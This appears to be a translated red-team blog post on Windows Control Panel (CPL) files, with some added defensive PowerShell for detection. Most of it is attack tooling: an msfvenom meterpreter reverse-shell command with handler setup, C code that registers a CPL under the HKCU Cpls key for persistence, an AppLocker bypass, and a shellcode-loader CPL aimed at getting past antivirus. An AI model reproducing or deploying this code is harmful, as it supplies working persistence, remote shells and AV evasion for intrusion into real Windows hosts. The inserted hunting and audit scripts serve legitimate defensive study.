preface

Recently, I came across CPL files by accident. Before that, I knew almost nothing about this type of file. Since it touched a blind spot in my knowledge, I decided to explore it.

CPL file

A CPL file is a Windows Control Panel extension; CPL stands for Control Panel Item.

The system32 directory contains a series of CPL files, one for each of the various Control Panel sub-options.

Press Win+R and enter main.cpl:

the Mouse Properties dialog of the Control Panel opens.

CPL files are PE files by nature.

However, a CPL is a DLL rather than an EXE: it cannot be run directly and can only be executed by being loaded into a host process.

It exports a function named CPlApplet.

This function is the entry point of a Control Panel application; it is a callback that the Control Panel manager calls automatically after loading the file.

How to open a CPL

2. control <file name>

3. rundll32 shell32.dll,Control_RunDLL <file name>

Every rundll32 shell32.dll,Control_RunDLL command can be replaced by control, because control.exe itself only calls rundll32.exe. When a CPL is opened this way, no control.exe process can be found afterwards; only rundll32.exe is visible.

4. VBS script (run with wscript.exe or cscript.exe)

Dim obj
Set obj = CreateObject("Shell.Application")
obj.ControlPanelItem("C:\Users\11793\Desktop\cpl.cpl")

5. JS script (WSH JScript, run with wscript.exe or cscript.exe; backslashes must be doubled in a JS string)

var a = new ActiveXObject("Shell.Application");
a.ControlPanelItem("C:\\Users\\11793\\Desktop\\cpl.cpl");
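The following is an added PowerShell example, not code from the original post. It launches a CPL the way the post describes (through control.exe) and then shows what is actually left in process telemetry: only a rundll32.exe with Control_RunDLL in its command line, because control.exe exits right after spawning it. The second function turns the same observation into a hunt for rundll32 instances that are loading a .cpl from outside the Windows directory. The CPL path is a placeholder; the host needs CIM/WMI access.

```powershell
# Added example (not from the original post). Assumes: a CPL at $CplPath,
# and that Get-CimInstance Win32_Process is available on the host.

function Start-CplAndObserve {
    param(
        [Parameter(Mandatory)] [string] $CplPath,
        [int] $WaitSeconds = 3
    )
    # control.exe is only a launcher: it runs
    #   rundll32.exe shell32.dll,Control_RunDLL "<file>"
    # and exits, so by the time you look, control.exe is already gone.
    Start-Process -FilePath 'control.exe' -ArgumentList ('"{0}"' -f $CplPath)
    Start-Sleep -Seconds $WaitSeconds

    # ParentProcessId will point at a control.exe that no longer exists;
    # resolving it needs recorded telemetry (Sysmon/EDR), not live state.
    Get-CimInstance Win32_Process -Filter "Name = 'rundll32.exe'" |
        Where-Object { $_.CommandLine -like "*$CplPath*" } |
        Select-Object ProcessId, ParentProcessId, CommandLine
}

function Find-SuspiciousCplHosts {
    # Hunt: rundll32 started via Control_RunDLL to load a .cpl that does not
    # live under %SystemRoot%. The regex accepts both quoted and unquoted
    # paths; a trailing comma after the path (as control.exe emits) is fine.
    $pattern = 'Control_RunDLL\s+(?:"(?<cpl>[^"]+\.cpl)"|(?<cpl>\S+\.cpl))'
    Get-CimInstance Win32_Process -Filter "Name = 'rundll32.exe'" | ForEach-Object {
        if ($_.CommandLine -match $pattern) {
            $cpl = $Matches['cpl']
            if ($cpl -notlike "$env:SystemRoot\*") {
                [pscustomobject]@{
                    ProcessId       = $_.ProcessId
                    ParentProcessId = $_.ParentProcessId
                    Created         = $_.CreationDate
                    Cpl             = $cpl
                    CommandLine     = $_.CommandLine
                }
            }
        }
    }
}

# Usage (placeholder path):
Start-CplAndObserve -CplPath 'C:\Users\11793\Desktop\cpl.cpl'
Find-SuspiciousCplHosts | Format-Table -AutoSize
```

The point of the hunt function is that the launcher (control.exe, a VBS/JS script, a double-click) does not matter for detection: every route ends in the same rundll32.exe command line, so that is where to look.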

How to make a CPL file yourself

The simplest way is to build a DLL that does not even export CPlApplet, and change the extension to .cpl. The host loads the file with LoadLibrary before it looks for CPlApplet, so DllMain runs regardless.

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Runs as soon as the CPL is loaded, before the host even looks up CPlApplet
        WinExec("calc.exe", SW_SHOW);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Either of the launch methods above works.

So, if calc.exe can be popped this way, can your own payload be executed the same way?

Applications of CPL files

Bypassing Windows AppLocker

What is Windows AppLocker? AppLocker is an application-control feature introduced in Windows 7 and built into Windows 7 and later (enforcement is limited to the Enterprise/Ultimate editions and the server editions).

Looking at the default AppLocker rule collections, you can see that .cpl is not covered: the default rules only cover executables (.exe, .com), Windows Installer files, scripts and packaged apps, and the DLL collection is not enabled by default.

Enabling AppLocker rules:

Open Computer Management, go to Services, and start the Application Identity service (AppIDSvc). Without it, no rule is enforced.

Then add an AppLocker rule in the local security policy; when creating the first rule, it asks whether to create the default rules.

The default rules are:

If an executable is run from a path the rules do not allow, the next attempt to run it is blocked with a message that it has been blocked by Group Policy.
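The following is an added PowerShell example and is not from the original post; it does in script form what the steps above do in the GUI, and then reports which rule collections the effective policy actually enforces. The rule Ids are freshly generated GUIDs, the XML mirrors the three default Exe rules the wizard creates, and the script assumes an elevated prompt on an edition that enforces AppLocker.

```powershell
# Added example (not from the original post). Assumes an elevated session on
# an AppLocker-capable edition; the XML reproduces the MMC "default rules".

function Enable-DefaultAppLockerExeRules {
    # The Application Identity service does the enforcement; without it nothing is blocked.
    Set-Service -Name AppIDSvc -StartupType Automatic
    Start-Service -Name AppIDSvc

    # Exe collection only: allow Program Files and Windows for everyone (S-1-1-0),
    # and everything for local Administrators (S-1-5-32-544). Nothing refers to .cpl.
    $template = @'
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="{0}" Name="(Default Rule) All files located in the Program Files folder" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="{1}" Name="(Default Rule) All files located in the Windows folder" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="{2}" Name="(Default Rule) All files" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
'@
    # Rule Ids are arbitrary GUIDs (generated here, not Microsoft's own Ids)
    $xml = $template -f [guid]::NewGuid(), [guid]::NewGuid(), [guid]::NewGuid()
    $tmp = Join-Path $env:TEMP 'applocker-default-exe.xml'
    Set-Content -Path $tmp -Value $xml -Encoding UTF8
    Set-AppLockerPolicy -XmlPolicy $tmp   # replaces the local AppLocker policy
}

function Get-AppLockerEnforcementSummary {
    # Effective policy = local policy merged with any GPO-delivered policy.
    [xml]$policy = Get-AppLockerPolicy -Effective -Xml
    $svc = Get-Service -Name AppIDSvc

    $mode = @{}
    foreach ($rc in $policy.AppLockerPolicy.RuleCollection) {
        $mode[$rc.Type] = $rc.EnforcementMode
    }
    # A collection that is absent from the XML is NotConfigured: that class of
    # file is not inspected at all.
    foreach ($type in 'Exe', 'Dll', 'Msi', 'Script', 'Appx') {
        if (-not $mode.ContainsKey($type)) { $mode[$type] = 'NotConfigured' }
    }

    [pscustomobject]@{
        AppIDSvcStatus   = $svc.Status
        Exe              = $mode['Exe']
        Dll              = $mode['Dll']
        Msi              = $mode['Msi']
        Script           = $mode['Script']
        Appx             = $mode['Appx']
        # A .cpl is a library loaded into rundll32.exe, which the Windows-folder
        # rule allows; only the Dll collection looks at what gets loaded.
        DllRulesEnforced = ($mode['Dll'] -eq 'Enabled')
    }
}

# Usage:
Enable-DefaultAppLockerExeRules
Get-AppLockerEnforcementSummary
```

If the summary shows Exe = Enabled and Dll = NotConfigured, the host is in exactly the state the rest of this section exploits: executables are whitelisted, but a library dropped anywhere and loaded through a whitelisted rundll32.exe is never evaluated.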

There are many ways to get around this, but I will focus on CPL files here.

Since whatever you put in a CPL file gets executed, you can use it to run something the rules would otherwise block; in this example it pops a cmd.

Generating a CPL directly with MSF

Generate the CPL file (msfvenom emits a DLL; the extension is simply set to .cpl):

msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.111.128 lport=8877 -f dll -o cpl.cpl

Copy the file to the target and run it, with MSF listening:

  • use exploit/multi/handler

  • set payload windows/meterpreter/reverse_tcp

  • set lhost 192.168.111.128

  • set lport 8877

  • exploit



This alone is not very interesting, but a CPL file can also be used as a backdoor for persistence, and a fairly inconspicuous one.

Rename the CPL file to test.cpl.

Create a small project that registers it in the registry:

#include <windows.h>

int main(void)
{
    HKEY hKey;
    DWORD dwDisposition;
    // Any path works; the CPL does not have to be on drive C
    char path[] = "C:\\test.cpl";

    // HKCU needs no admin rights. The same key under HKLM would register it machine-wide.
    if (RegCreateKeyExA(HKEY_CURRENT_USER,
                        "Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls",
                        0, NULL, 0, KEY_WRITE, NULL, &hKey, &dwDisposition) != ERROR_SUCCESS)
        return 1;

    // The value name is arbitrary; the data is the path control.exe will load
    RegSetValueExA(hKey, "test.cpl", 0, REG_SZ, (BYTE*)path, (DWORD)(1 + lstrlenA(path)));
    RegCloseKey(hKey);
    return 0;
}

The CPL file does not have to be saved on drive C; any path can be used.

After running it:



Now, whenever control.exe (the Control Panel) is opened, test.cpl is loaded as well.
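The following is an added PowerShell example, not code from the original post, for the defender's side of the persistence trick just described: it enumerates the Cpls keys under both HKCU and HKLM, resolves each registered path, checks whether the file exists and carries a valid Authenticode signature, and offers a removal helper. It assumes it is run on the host being inspected with Get-AuthenticodeSignature available (Windows PowerShell 5.1 or PowerShell 7 on Windows).

```powershell
# Added example (not from the original post). Assumes a Windows host with
# Get-AuthenticodeSignature; entries are read from both user and machine hives.

function Get-RegisteredCpls {
    $keys = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls'
    )
    foreach ($key in $keys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $item = Get-Item -LiteralPath $key
        foreach ($name in $item.GetValueNames()) {
            # Values are REG_SZ or REG_EXPAND_SZ paths; expand %SystemRoot% and friends ourselves
            $raw  = $item.GetValue($name, $null,
                        [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
            $path = [Environment]::ExpandEnvironmentVariables([string]$raw)

            $exists = Test-Path -LiteralPath $path -PathType Leaf
            $sig = if ($exists) { (Get-AuthenticodeSignature -FilePath $path).Status } else { 'FileMissing' }

            [pscustomobject]@{
                Hive       = $key.Split(':')[0]
                ValueName  = $name
                Path       = $path
                InWindows  = ($path -like "$env:SystemRoot\*")
                Signature  = $sig
                # Vendor CPLs legitimately live outside %SystemRoot%, so location
                # alone is not damning; a missing file or an unsigned one is.
                Suspicious = (-not $exists) -or ($sig -ne 'Valid')
            }
        }
    }
}

function Remove-RegisteredCpl {
    param(
        [Parameter(Mandatory)] [ValidateSet('HKCU', 'HKLM')] [string] $Hive,
        [Parameter(Mandatory)] [string] $ValueName
    )
    $key = "${Hive}:\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls"
    Remove-ItemProperty -LiteralPath $key -Name $ValueName
}

# Usage: list everything, then show only the entries worth a look
Get-RegisteredCpls | Format-Table -AutoSize
Get-RegisteredCpls | Where-Object Suspicious | Format-Table -AutoSize
# Remove-RegisteredCpl -Hive HKCU -ValueName 'test.cpl'
```

The HKCU key is the interesting one from a hunting standpoint: a user-writable location that no stock Windows component normally populates, so on most workstations any value there at all deserves a look.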

If the target host runs antivirus, this technique can be combined with a "white plus black" chain (a trusted, whitelisted binary loading an untrusted DLL) to get past it, but an msfvenom-generated CPL has very obvious characteristics and is likely to be caught by static scanning.



Rather than using a ready-made shell, it is better to implement the shellcode loading yourself, which makes obfuscation much easier.

Building your own CPL with shellcode

Straight to the code:

#include "pch.h"
#include <windows.h>
#include <cpl.h>

// Real signature of the Control Panel entry point: LONG return, stdcall on x86
extern "C" __declspec(dllexport) LONG CALLBACK CPlApplet(HWND hwndCPl, UINT msg, LPARAM lParam1, LPARAM lParam2)
{
    // The host sends several messages (CPL_INIT, CPL_GETCOUNT, ...); run the payload once, on the first
    if (msg != CPL_INIT)
        return 0;

    MessageBoxA(0, NULL, "test", MB_OK);

    /* placeholder: replace with the raw shellcode bytes (e.g. msfvenom -f c); the author's was 835 bytes */
    unsigned char buf[] = "shellcode";

    // Very basic loader: RWX allocation, copy, call. No encoding, no evasion.
    LPVOID Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (Memory == NULL)
        return 0;
    memcpy(Memory, buf, sizeof(buf));
    ((void(*)())Memory)();
    return 1;   // TRUE: initialised
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

This is a very, very basic loader.

First open it with control.exe to see the effect:

Then look at the detection rate:



The shellcode uploaded here was not processed in any way, and the detection rate is already fairly low. With some obfuscation it should get past static AV scanning easily, and combined with a "white plus black" chain, it is easy to see the potential.

After a series of processing steps, let's try it against 360, whose antivirus capability is relatively strong.